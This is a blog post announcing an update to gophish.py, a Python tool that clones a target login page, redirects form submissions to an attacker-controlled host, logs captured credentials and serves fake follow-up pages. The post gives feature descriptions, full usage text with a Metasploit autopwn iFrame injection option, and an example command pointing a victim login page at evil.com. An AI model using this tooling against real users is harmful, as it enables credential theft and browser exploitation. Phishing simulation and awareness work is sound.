I’ve released a new version of Gophish.py. The update includes:
- Fixed a bug in rewriting the method attribute in phished forms
- Fixed a bug with GET based forms
- Fixed a bug in the autofill option, fixed the demo/sample file accordingly
- Fixed some bugs regarding correctly closing files
- Added in functionality to reverse BeautifulSoup fixing & to &
- Added functionality to rewrite ‘url(www.example.com)’ in CSS
- Added functionality to handle onsubmit/onkeypress/onclick attributes in FORM/INPUT tags
- Added a feature to pass a user agent header when connecting to the target
- Added a feature to send cookies
- Added a feature to serve a click through page post form submission
- Added clickable feature to provide more click through pages post submission and initial click through
Quite a few bugs were fixed, one of which has been around from the beginning. In some cases, the METHOD attribute of FORM tags wasn’t correctly rewritten, breaking form submission functionality.
I updated the code to use ‘soup.prettify(formatter=”html”)’ in order to fix some issues with bad characters and HTML. This broke the autofill functionality. I have now updated that functionality as well as the sample file.
In some cases, files opened by gophish weren’t correctly closed, which broke the script after the first initial connection. This is now fixed.
The first “feature” I added is more of a fix. BeautifulSoup, when using ‘formatter=”html”‘, tries to fix bad HTML by closing out some tags, changing &’s to &, < to <, and > to >. The last two are fine, but the & fix seems to more often result in  ’s being printed on HTML pages because they are rewritten as &nbsp. I now re-fix this after BeautifulSoup does its thing.
The next functionality enhancement involves rewriting CSS within the page that includes ‘url(www.example.com)’ code. This will now get rewritten to point at the correct URL if instead the value is something like ‘url(/path/to/file)’.
In addition, I also added some functionality to prevent onsubmit/onkeypress/onclick attributes within FORM/INPUT tags that in some cases break form submissions. Those are now rewritten to be empty.
Now the fun stuff; features. The first feature seems like a no-brainer. You can now pass a file containing a ‘User-Agent’ header to gophish. The new option is ‘–useragent filename.txt’, assuming the user agent file you are using is named ‘filename.txt’. This will resolve issues in which the site responds back with a “Browser not supported” page instead of the correct phishing page based on the user agent sent by Python.
Now for the fun stuff. I’ve added in real click through support with new options. The first option is ‘–clickthrough clickpage.html’, assuming the first click through page you want to use is named ‘clickpage.html’. This changes the functionality for gophish where instead of logging submitted form values and redirecting to the real page (and submitting the form values to the real page), it will open the ‘clickpage.html’ file. So you can have the initial phish page and then have a secondary fake post login page for example.
The next option, ‘–clickable’, builds on this functionality. You can provide additional html files, comma delimited, that are opened based on their name. So, if you passed in ‘–clickthrough clickpage.html –clickable page1.html,page2.html,page3.html’ for example, the flow would be:
- User accesses initial phish page, fills in form data, and submits
- Submitted data is logged and then user is served ‘clickpage.html’
- If ‘clickpage.html’ also has a form with an action of ‘page1.html’ and the user submitted the form then they would then be served ‘page1.html’, which was provided with the ‘–clickable’ option.
- Or, if there are other links for the user to click on with an href=’page2.html’ and href=’page3.html’, then if the user clicks on one of these links, they will be served the respective page
These new features greatly enhance the functionality of your phishing page while remaining simple to use and implement. I hope someone out there finds them useful.
The new version of the code can be found here. The updated autofill sample file can be found here. A sample user agent file can be found here.
Updated usage information for the script:
usage: gophish.py [-h] --phish PHISH --replace REPLACE [--logfile LOGFILE] [--listen LISTEN] [--port PORT] [--ssl] [--sslchain SSLCHAIN] [--sslcert SSLCERT] [--sslkey SSLKEY] [--autopwn AUTOPWN] [--autofill AUTOFILL] [--redirect REDIRECT] [--redirectto REDIRECTTO] [--landing LANDING] [--clickthrough CLICKTHROUGH] [--clickable CLICKABLE] [--useragent USERAGENT] [--sendcookies] Automatically setup a phishing site. optional arguments: -h, --help show this help message and exit --phish PHISH the full URL to phish back to the victim (must include http(s)://) (default: None) --replace REPLACE the IP/FQDN to replace FORM actions with (must include http(s):// and final /) (default: None) --logfile LOGFILE log file to store submitted form values (default: phishlog.txt) --listen LISTEN the IP to bind to (default: 0.0.0.0) --port PORT the port to start the listening web server on (default: 80) --ssl enable SSL on the running port (default: 0) --sslchain SSLCHAIN certificate chain file to use when ssl option is enabled (default: chain.crt) --sslcert SSLCERT certificate file to use to use when ssl option is enabled (default: ssl.crt) --sslkey SSLKEY private key file to use to use when ssl option is enabled (default: ssl.key) --autopwn AUTOPWN Metasploit auxiliary/server/browser_autopwn URL to inject as an iFrame (default: None) --autofill AUTOFILL file to use to autosubmit autocomplete fields (default: None) --redirect REDIRECT redirect requests for this address somewhere else (default: None) --redirectto REDIRECTTO redirect requests in the redirect option to this address (full link, must include http(s)://) (default: www.google.com) --landing LANDING redirect to this landing page instead of original site after form is submitted (include full link) (default: None) --clickthrough CLICKTHROUGH file to serve up after user enters form credentials on main phish page (default: None) --clickable CLICKABLE used in combination with clickthrough, comma separated list of files to serve based on requested name (default: None) --useragent USERAGENT file to use to pass a user agent value in the request (default: None) --sendcookies initiate a connection, get the cookies, send cookies back in second connection (default: 1) Example: gophish.py --phish https://www.victim.com/login.php --replace https://www.evil.com --port 443 --ssl --sslchain chain.crt --sslcert ssl.crt --sslkey ssl.key
Leave a Reply